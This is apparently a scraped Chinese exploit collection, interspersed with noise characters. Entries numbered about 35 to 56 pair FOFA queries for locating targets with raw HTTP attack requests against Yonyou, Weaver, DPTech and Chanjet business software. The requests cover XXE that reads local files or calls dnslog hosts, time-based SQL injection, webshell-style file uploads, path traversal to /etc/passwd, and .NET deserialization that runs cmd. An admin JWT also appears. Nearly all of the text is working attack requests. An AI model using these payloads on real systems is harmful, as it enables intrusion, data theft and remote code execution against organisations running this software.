! T2 f" E2 r! [5 |: S/ Q. ZHost: 203.25.218.166:8888
, Y" b: X& T2 F. n$ _; a& sUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
6 B( A5 b! w. J& D5 NAccept-Encoding: gzip, deflate
% O" v4 j5 I( n) K9 k4 U: oAccept: */*1 G8 z5 {! a* ]0 I0 y
Connection: close, m5 P8 Q {9 [* [% O6 V5 y+ A- k
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
?) V" T- z, F/ ]1 {0 kContent-Length: 1900 {2 G- |; U6 U. k
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
& w5 ?+ N5 J0 M! C4 q
8 a- f* x% M7 i2 y' r--fd28cb44e829ed1c197ec3bc71748df0
/ b8 {- t b8 f* m MContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
# R+ ~( `7 A5 e& z8 E0 E e6 W. ^$ p: z$ s* e3 n# b9 M
<%out.println(1111*1111);%>
0 C" E* n# u# K; U- {7 M--fd28cb44e829ed1c197ec3bc71748df0--
8 A8 k+ _! C* _( P# {- J6 I9 \
6 Q1 W! x9 V9 ~' H7 U, A: e+ q: b G2 _9 h6 x
36. 用友NC-Cloud soapFormat XXE( i/ `& X2 V) h- f$ p3 d$ d" A8 u# x
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
. o; v+ R. j1 z; PPOST /uapws/soapFormat.ajax HTTP/1.1/ }! |, { |: R$ S2 \2 R
Host: 192.168.40.130:89893 t$ T4 H' ~* M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
" I" t2 t: f4 ?( }7 [9 d) O0 EContent-Length: 263% e( T3 X) i" N4 E. A0 }3 @9 _! F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 M) n/ }) a; J; p4 S6 @3 ^% A; WAccept-Encoding: gzip, deflate
7 ~: z. Y: k$ o, k' qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- \) i- [0 ~0 K% P% X% |0 f1 L0 e
Connection: close& j& c |. c8 ?1 U" J1 w
Content-Type: application/x-www-form-urlencoded
- k+ `: [1 F$ | eUpgrade-Insecure-Requests: 1
% z* |( w0 z0 ]% N8 X$ r6 D9 L" j/ U$ B5 Z
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
# `. I+ Y: L$ c: I, [* T2 _7 f D
$ j; G; k; O2 \( [( |1 A( v% E
5 a3 u% }: C# v/ P$ F d$ K% j37. 用友NC-Cloud IUpdateService XXE
2 }3 ~; E/ z/ NFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
: ~5 p& G( P' P5 I! ~) J3 lPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
2 p P) V$ k1 HHost: 192.168.40.130:8989- d" K8 d6 D$ K1 V2 c1 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
( u- C) I; T0 K, NContent-Length: 421
% q4 |& S5 }7 @: C4 m7 \+ XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
% P5 n4 u s- g3 ]# ]Accept-Encoding: gzip, deflate
- D, |: m B; H Y- _* qAccept-Language: zh-CN,zh;q=0.9- T9 a' p9 i/ F( ^- T( F5 G
Connection: close3 L1 m6 q" x) c! U1 ]6 u1 {* c; R
Content-Type: text/xml;charset=UTF-80 V8 _" |; T% l- n
SOAPAction: urn:getResult
; M5 g+ b& g. E/ f# s lUpgrade-Insecure-Requests: 1
# f5 N) a" r& x2 B1 a. ]. Y) m0 r! w! r5 B5 a
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">' c9 ?2 U2 B( K2 X% b
<soapenv:Header/>
+ d' T5 }; k* r( x" b<soapenv:Body>
3 e5 y% K6 l2 s: }( D- c<iup:getResult>
4 q5 D: r7 I$ E6 G8 p q4 m8 P<!--type: string-->
; U X& l u. d1 }& n<iup:string><![CDATA[) ^6 d& E: l) ]( L
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
0 k5 a3 w+ f) y. x% u1 b" E5 d<xxx/>]]></iup:string>( \+ h1 g" H# W3 K! s6 |0 n
</iup:getResult>
' _7 m; y( t" a3 ]3 w3 P</soapenv:Body>/ S& K& P* i& p n: c& p" Y9 u
</soapenv:Envelope>6 D8 y" F- E u/ j2 }/ r3 [' U
2 s" O! o3 p' C. E# r
3 e; p! Q# p) J- o
5 q! _7 }3 S6 [( P9 r38. 用友U8 Cloud smartweb2.RPC.d XXE4 z) {: k2 m& z+ _! ?9 W1 y9 B
FOFA:app="用友-U8-Cloud"+ |7 ?8 V6 B# d
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1( \' _# {8 Z1 S
Host: 192.168.40.131:8088
1 M. \. ~. v+ G7 N& RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
9 N' y9 ?$ \8 f+ i" t, v; k' LContent-Length: 260
1 w' b- _3 S% I% kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3( Z/ K& N; I# y, g, V6 T4 b' Y3 g
Accept-Encoding: gzip, deflate
9 h* z: h& R t0 w( r9 AAccept-Language: zh-CN,zh;q=0.9
9 W) A& j6 D, T# }Connection: close
* }3 J6 h( S& u, tContent-Type: application/x-www-form-urlencoded
( }. }& }. s* P& w) |' T7 D2 ]6 X/ c
. `6 i7 d+ S$ W, R7 R1 L4 y__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
r8 @6 x; m# K/ I% k w3 |
1 O1 Z. i7 W" U# s; u5 `% X6 P' i6 B& \" H# R/ m
39. 用友U8 Cloud RegisterServlet SQL注入
* [8 ]$ X3 R% r9 S0 n# oFOFA:title="u8c"; v3 g# @2 s& y) H0 K( ^
POST /servlet/RegisterServlet HTTP/1.1
( Q+ h2 A1 ~. J: f. @" y" LHost: 192.168.86.128:8089: m/ c8 [" J$ K% v2 f) D% b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36% ]9 z I; n+ F! G# S2 x# ?4 q
Connection: close0 B5 g- N% S, B4 o+ @# l+ e" j( z
Content-Length: 85
- |- |3 I9 ] b6 z3 J9 |Accept: */*
, e! E% s* z+ {# a3 q! U& n( pAccept-Language: en/ Z( e* G- W- U5 x
Content-Type: application/x-www-form-urlencoded* |0 v+ N* U5 Q; \( i, a, Y' f
X-Forwarded-For: 127.0.0.1
1 y {7 {& d3 c, N- OAccept-Encoding: gzip o9 ~2 ` Z4 `, H) r, O w$ A, P
; `* K4 v9 @) K% P9 K# Wusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
& i' u$ P9 w+ {$ s' l
' ~2 `% ^) F0 V- a9 G
! x9 S! h P& Y m40. 用友U8-Cloud XChangeServlet XXE
! H0 b9 F" `0 N# ?/ O% mFOFA:app="用友-U8-Cloud"; G j/ g% `* z! O* ?3 L+ F
POST /service/XChangeServlet HTTP/1.18 ~) ^# J8 F8 _* s
Host: x.x.x.x
* Z' s2 ~, \3 T* x$ |/ bUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.364 G) L! R" ?# k
Content-Type: text/xml
t$ d8 P1 H" O% k% H9 E- z5 x2 ^Connection: close
5 Y3 d& V4 `0 L- k1 m; V0 S
2 l- l( i& k, L( n; K<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>' h+ v7 l8 j4 d
0 u3 M' a u) Z! I$ i
; U5 _( Y7 c5 n, f" E5 z41. 用友U8 Cloud MeasureQueryByToolAction SQL注入& f Q1 ?2 e$ w
FOFA:app="用友-U8-Cloud"
4 ^" u1 c1 C) T& p F, @GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.11 d8 R) W0 a7 l% t+ y, i8 R
Host:
: k9 T% M5 g7 Y& vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! q2 S. T2 g2 m; a& D2 N
Content-Type: application/json( R$ H) {9 L9 w' B3 W2 {
Accept-Encoding: gzip& v8 w( S# y& o/ k2 x3 f
Connection: close5 k4 U* w2 B3 S" d( s
8 n, {$ S' E3 f" z. S' F$ i# s) n5 ]
2 l4 Q x5 _4 e; u8 |$ c42. 用友GRP-U8 SmartUpload01 文件上传
y5 j; t& l6 Q5 T, sFOFA:app="用友-GRP-U8" |0 C/ Y* d7 M' A
POST /u8qx/SmartUpload01.jsp HTTP/1.1: y) f2 K2 _' {) Y- L
Host: x.x.x.x
4 v9 A; A6 H. d5 `" UContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
! i+ ]0 W- V/ n5 g/ P% YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
. p# C& x' R' ]% D/ e6 n. S6 G f
- H1 b" \& J& N" } E1 iPAYLOAD3 C! w+ H) T9 q( h9 V- J$ d0 s2 o
5 ^! l' d" m$ S9 A
# Q& R7 ~/ K+ hhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
* o" E) N/ W- O+ D5 Y
% X5 H [( B; V1 F" l43. 用友GRP-U8 userInfoWeb SQL注入致RCE
. _: x' x4 C, Z6 m7 |; b5 G% Y( f, nFOFA:app="用友-GRP-U8"( G; m7 A5 I# n( S4 M( M8 }8 D
POST /services/userInfoWeb HTTP/1.19 U6 `. k8 M( `9 W( c5 v K
Host: your-ip% V- m* ?9 j: ^% j/ }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
2 e. y0 c. i. A' k- w+ tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ z* D4 a2 ?5 B9 n, f( eAccept-Encoding: gzip, deflate
& p; Q6 p) q+ A! dAccept-Language: zh-CN,zh;q=0.9' C& t" k5 Q5 e; V" z+ q# ]4 J
Connection: close! L) q) r5 R. q/ o
SOAPAction:
9 H$ W3 H: x; {" d& mContent-Type: text/xml;charset=UTF-8. M( R4 s" ^1 H5 K' V% z
" V, C+ [1 R# D" y' X/ @$ U F9 F<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
8 i+ e* f- j7 ?- J2 e4 N <soapenv:Header/>
: q- s4 c( t1 g6 T# e4 E8 q; j. l. | <soapenv:Body>
1 c" m G" u0 G <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">" P6 \' z2 F- L0 O; Z( h& ]
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
. \% C! c/ i9 G! I4 k& S2 b </ser:getUserNameById>
# c* P7 z# W4 Q* o- _- |2 Q </soapenv:Body>1 v( U7 K r8 p8 S R
</soapenv:Envelope>
& ]7 N3 i! o; F3 U, e
; ?+ ?" {* ~- ~# r3 _* k
) }2 \$ z/ D9 Q& ^44. 用友GRP-U8 bx_dj_check.jsp SQL注入
' F6 ^$ y, h4 M4 u( n& GFOFA:app="用友-GRP-U8"; |2 U2 k' W& p o$ X; J5 a
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
4 O# Y7 o2 g5 ^3 N2 OHost: your-ip
1 u/ k4 C% B7 p3 a& Z* SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
# i; M' K" S" X# |- @- o( t& i9 bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' B6 D6 u3 C6 S
Accept-Encoding: gzip, deflate
! ?8 U( n* F: g8 T9 O! d4 xAccept-Language: zh-CN,zh;q=0.92 \( [9 ~- ~- [6 q W
Connection: close
* m5 P ?! Y; r6 |4 _6 k* c! G3 e
! }+ d7 [+ O4 @, X- n
6 f& J# Y* Y# t2 S45. 用友GRP-U8 ufgovbank XXE
8 X7 y) a j" ~. c( e$ S. M* UFOFA:app="用友-GRP-U8"8 C& L$ N+ v8 J. p l( L
POST /ufgovbank HTTP/1.11 |( ]2 e% z( i8 |8 ?/ Z3 a
Host: 192.168.40.130:2224 \7 ?& R5 v1 m- A4 M6 G+ V, k {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0& s7 V4 G+ k8 U* ?8 Q/ A
Connection: close
7 V0 h' B2 P# m( p* hContent-Length: 1619 ]0 V7 L3 Y$ ^6 b r- `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ t# n* L2 |! q8 x" R d4 t# u7 b. oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 c1 `, f/ G; d- h4 uContent-Type: application/x-www-form-urlencoded
" L; g, ]$ p& b& VAccept-Encoding: gzip$ G: y/ g( w1 |, H0 A
9 Z N6 R5 W# z0 [1 n; ?* p
reqData=<?xml version="1.0"?>" ]: v' o0 p3 x
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest" E1 @% H* ^- j: O) B
) I7 I) J( n3 P% k5 U" O' V
8 H O2 v' E+ w) p9 v8 ]9 d
46. 用友GRP-U8 sqcxIndex.jsp SQL注入0 }. j- d' J% g) o
FOFA:app="用友-GRP-U8"2 g8 D0 e; L3 ~2 z$ L+ D
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
& a: H% Q K/ OHost: your-ip
. i) s7 H# r G0 e+ a& DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36+ O5 K' [( T- }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
B6 N- v: ~) Z8 F. L2 Y! fAccept-Encoding: gzip, deflate
( w6 h$ I9 _7 `/ wAccept-Language: zh-CN,zh;q=0.9
. n" x9 e3 p/ o: h( qConnection: close3 M: }" M$ l0 d% k! E- @7 ^
. G: {1 H; p# u+ ^/ H- R5 b! o9 h' J* f4 d# Y9 V
47. 用友GRP A++Cloud 政府财务云 任意文件读取
) q9 S S. l7 ?$ M0 @4 bFOFA:body="/pf/portal/login/css/fonts/style.css"( J$ u2 Y- H3 {8 E
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
+ P) J2 n8 K0 D$ dHost: x.x.x.x1 K; S/ |. T% [+ l
Cache-Control: max-age=0
5 n* V1 F. g2 DUpgrade-Insecure-Requests: 1
+ L* W! m7 r" w$ SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
9 q9 y* K$ m; j, c' fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 o1 H6 p& I+ S' Y* [1 {Accept-Encoding: gzip, deflate, br
% r" }* s& t0 d: VAccept-Language: zh-CN,zh;q=0.9# I. C7 G* E6 }; ~6 F$ Z
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
2 j3 N1 S# J2 u7 ^4 J, q# bConnection: close, m2 g3 P- ?! U6 t$ B% e0 e
. \1 y8 f6 J% t
! Z& r' _3 ~) x9 H& B
. C p8 `$ W' {* e
48. 用友U8 CRM swfupload 任意文件上传
, V a& q; Q1 }& R1 kFOFA:title="用友U8CRM"1 o- e, _4 Q# Z8 A" Y; l/ m
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1- o# y# j0 M; d
Host: your-ip
2 R, [) {' ^) ~: t- wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% g$ c" t) {" M, L dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, I, s5 d; B6 S. Z! i& IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( R' k0 L7 b3 k3 c5 V
Accept-Encoding: gzip, deflate
9 ^8 q( q6 U& ]2 z7 A. Z; eContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
0 Y' w( H) P' \------269520967239406871642430066855
6 I! K) t8 h: s7 z- JContent-Disposition: form-data; name="file"; filename="s.php"
- v( d7 i: t- S( }* v2 k1231
4 ~( S; _2 Y( V/ JContent-Type: application/octet-stream
6 J" q1 S6 p1 ^0 z6 u' {( F------269520967239406871642430066855
. a0 H5 j; p$ jContent-Disposition: form-data; name="upload"2 W" Q8 g4 i1 K H- ?/ G
upload, @6 p" k/ u \
------269520967239406871642430066855--
6 _7 M$ U( c/ _: I& p6 b! N6 o, j6 B& ]+ e1 m6 l* S2 J
) O# D+ q9 H" t4 u4 [' O6 Z$ y
49. 用友U8 CRM系统uploadfile.php接口任意文件上传0 L4 Z" _* @+ c$ Z5 q! w
FOFA:body="用友U8CRM"
; `4 u' ~* D4 D- k8 n# N5 U2 S3 K& ^7 K
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1; Y" X! v7 W2 Y' Q9 V" h# r
Host: x.x.x.x
/ k* P/ |. P1 m8 w2 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: g" ^$ T+ O Q% m0 ?3 K% ~3 _: x
Content-Length: 329
: [4 [" N/ m; B q$ ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 G. m' g2 p2 YAccept-Encoding: gzip, deflate
$ z1 p3 _3 |6 x0 A6 m/ q$ UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' a( @: r/ p; Z! f" m
Connection: close: `& [3 w, w8 m/ H p
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w$ C$ N; N; r% q( A
8 Z& f$ A. @4 E, @-----------------------------vvv3wdayqv3yppdxvn3w
0 P3 u& K9 n4 @* p8 |3 R, |% ^Content-Disposition: form-data; name="file"; filename="%s.php "
' Z8 l6 @- I$ X8 vContent-Type: application/octet-stream) M& M( e& L7 I' g" m0 c+ I% h
( H5 X& P4 \0 N' F4 cwersqqmlumloqa
; \! v7 V0 t8 r/ i-----------------------------vvv3wdayqv3yppdxvn3w! ^* L! o6 C2 K; [) K) [* u6 E/ ]
Content-Disposition: form-data; name="upload"6 S/ a% x6 G; { K8 f! V9 `
% P9 B& E2 A$ b/ p
upload, O2 J1 H. l- p
-----------------------------vvv3wdayqv3yppdxvn3w--
) y9 z* M! y$ e! h3 j/ H+ x# r
$ Y$ [9 F2 ^/ Z$ {
: P1 |, x) f0 d" Q( Qhttp://x.x.x.x/tmpfile/updB3CB.tmp.php3 K0 k5 f' ~) L7 b, o
( \5 z. b$ o. n% s/ c! K1 x# r
50. QDocs Smart School 6.4.1 filterRecords SQL注入
+ r7 E6 u% y9 m! d# hFOFA:body="close closebtnmodal"
: R( V7 r& x* ZPOST /course/filterRecords/ HTTP/1.1
- A5 X: @' p T* @& [6 m* DHost: x.x.x.x
$ U$ S- B: K' J' D; f) JUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
: ]* u3 D1 M- y1 D- o# }Connection: close! T5 V5 D0 T( O2 d* d/ e
Content-Length: 224! E1 d" w5 `0 x+ _, t
Accept: */*
" i9 d0 D% d% d( X# H3 V# bAccept-Language: en% g7 Y/ A5 v& {1 s
Content-Type: application/x-www-form-urlencoded
) e8 j/ Z5 z4 D" p/ g- D* l7 fAccept-Encoding: gzip
% q! t0 y8 Y( U* s2 J
# C7 s8 K8 _: `1 Gsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1$ c8 }, I7 G6 q
0 b# U) f' M2 N1 }2 K
$ W) }& K- Q" f8 {51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
' `& \$ n; i3 l Q/ }FOFA:app="云时空社会化商业ERP系统"& e: o9 W. ^( x& I; l. Q
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.18 {4 ]8 E% L! ~3 E( }
Host: your-ip( t# t1 i& x6 v2 d, G4 `( ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36' Y2 M: v& X* V' p! a G/ B0 r3 s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
/ W, q* b- x4 O. t' bAccept-Encoding: gzip, deflate" F, |. e* E5 u5 `& r* |
Accept-Language: zh-CN,zh;q=0.9
/ n' `5 r9 C8 g& O/ HConnection: close
; a: T- z0 l* l( U" B! k% X3 X }+ E# g% Q
) D- ]' @% V$ m" u' [5 d
52. 泛微E-Office json_common.php sql注入
0 L3 S& D' r& x- d+ ^& ~4 gFOFA:app="泛微-EOffice"9 R; ^' f9 c7 K; b
POST /building/json_common.php HTTP/1.1( C, |1 ?4 E. \3 [6 @
Host: 192.168.86.128:8097$ S' Z* ^0 C/ A, z, e0 ?; B
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 J* ]* v5 r. ~9 }
Connection: close
" }' Q& r5 M0 r$ b5 `: wContent-Length: 87
% I: N, u1 @5 J) t' |, jAccept: */*8 Q- w$ b" W% s9 `
Accept-Language: en
- j1 n6 ^) w8 G* E% i; CContent-Type: application/x-www-form-urlencoded
4 c( q# x! v+ b9 k# l! X0 dAccept-Encoding: gzip
( P% z" L. } q# D; w4 t8 @9 w1 M1 A( x& _0 B- ~" i
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333, i# y r" t& B8 |
6 g0 [' x/ u* O V$ F, \# ]0 \! u" u3 P7 h% |6 J" @1 e0 e. H! {
53. 迪普 DPTech VPN Service 任意文件上传5 _/ M: S2 K$ P& D/ c& N: @& ]! k
FOFA:app="DPtech-SSLVPN"4 }: w6 x3 A3 l/ W( E5 c
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
$ k3 @8 {1 d2 p. N0 L, w8 n2 G `0 h5 [
% v4 F+ g' q3 w+ m54. 畅捷通T+ getstorewarehousebystore 远程代码执行
+ r# {5 [8 D0 a5 h; zFOFA:app="畅捷通-TPlus"
- w# j; Y* }9 i: e; w6 X第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
- B3 ?9 l; A2 a) }, |"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"- Q4 _5 p* Z: i. |
- W( R: K2 f) l% f9 j$ N4 D) Q( b
+ R" U, W1 ?9 X0 [+ y$ |
完整数据包' B5 g2 X; @4 j, h4 c j3 h7 J# N
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.19 v; l; ?5 R0 X; z7 s
Host: x.x.x.x
; k) |: ?1 X# G' o) BUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
, A: Q* e( P' M) u$ Y% lContent-Length: 593
9 A: m8 @* f+ \ r9 ^3 b8 B- ~0 X" i7 _5 }" S Y! U+ O: Z) y
{
5 w5 z1 ]8 f" b+ c"storeID":{" D' d% z0 i) `# n6 o
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",) A, ]1 t# H( t: F: R. Y! m
"MethodName":"Start",
$ q$ r, u6 k. ~& @8 ]6 B$ H1 u& a "ObjectInstance":{
, @3 I+ `/ \/ ^ A- k( ^0 q "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
9 \) q9 k0 E' F& }- S/ R "StartInfo":{$ y' c7 H! A, d+ V% e6 P
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
1 m' N) @' y4 S' W0 G# L! z9 l+ E "FileName":"cmd",
+ ?6 b9 V1 |6 C/ a& v! m "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
$ y* D5 v7 K. H3 y1 M }
# A8 S! d6 J u$ n, f }. T, E; g9 z1 K' g8 [% Y; m; Q D
}, W# E* f+ `5 }; j; g b: q4 L+ m, ~
}9 x4 z! l& r# h$ ]; \4 a
9 o* @: Z# L) x& m' r8 I4 ~
' M" H- S' _ ~+ t: y第二步,访问如下url
& M3 n9 u& [0 A) k/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt% ?! @- K* ~7 m% g( u9 m5 |) U. I
6 o) g. [! A2 U6 \7 [
; D4 p0 L9 r3 A7 ~; }0 y- O' m55. 畅捷通T+ getdecallusers信息泄露
1 X, Y% x, a3 {& G6 ?/ P+ XFOFA:app="畅捷通-TPlus"
6 D: ?7 t. V" @3 j% J' C! m+ Z3 L0 k第一步,通过) s3 S, c) _6 I0 P+ o
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie# x/ s7 G8 _2 I; C
第二步,利用获取到的Cookie请求: S% j* O" K4 T: r9 C
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers! r6 U# F" N$ @0 l: f
( K# U* B; y, ]4 g56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
$ ?7 y3 u0 h0 P: Q- nFOFA: app="畅捷通-TPlus"
/ t7 s3 M7 H3 ^" SPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
) R" |4 P4 t' p# p& B* L) ?, wHost: x.x.x.x
+ q" m7 T* d5 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36: o4 `8 K: D' c. B6 v
